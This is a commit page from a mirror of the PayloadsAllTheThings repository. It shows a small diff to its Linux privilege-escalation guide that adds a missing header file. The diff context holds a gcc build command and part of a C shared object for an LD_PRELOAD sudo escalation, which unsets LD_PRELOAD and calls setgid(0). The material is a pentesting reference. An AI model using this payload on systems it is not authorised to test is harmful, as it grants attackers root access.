mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-02-22 14:43:45 +00:00
Merge pull request #398 from bash-c/patch-1
add missing header file in Linux - Privilege Escalation.md
This commit is contained in:
commit
2d273fd40e
@ -442,10 +442,11 @@ Defaults env_keep += LD_PRELOAD
|
|||||||
|
|
||||||
Compile the following shared object using the C code below with `gcc -fPIC -shared -o shell.so shell.c -nostartfiles`
|
Compile the following shared object using the C code below with `gcc -fPIC -shared -o shell.so shell.c -nostartfiles`
|
||||||
|
|
||||||
```powershell
|
```c
|
||||||
#include <stdio.h>
|
#include <stdio.h>
|
||||||
#include <sys/types.h>
|
#include <sys/types.h>
|
||||||
#include <stdlib.h>
|
#include <stdlib.h>
|
||||||
|
#include <unistd.h>
|
||||||
void _init() {
|
void _init() {
|
||||||
unsetenv("LD_PRELOAD");
|
unsetenv("LD_PRELOAD");
|
||||||
setgid(0);
|
setgid(0);
|
||||||
|
Loading…
Reference in New Issue
Block a user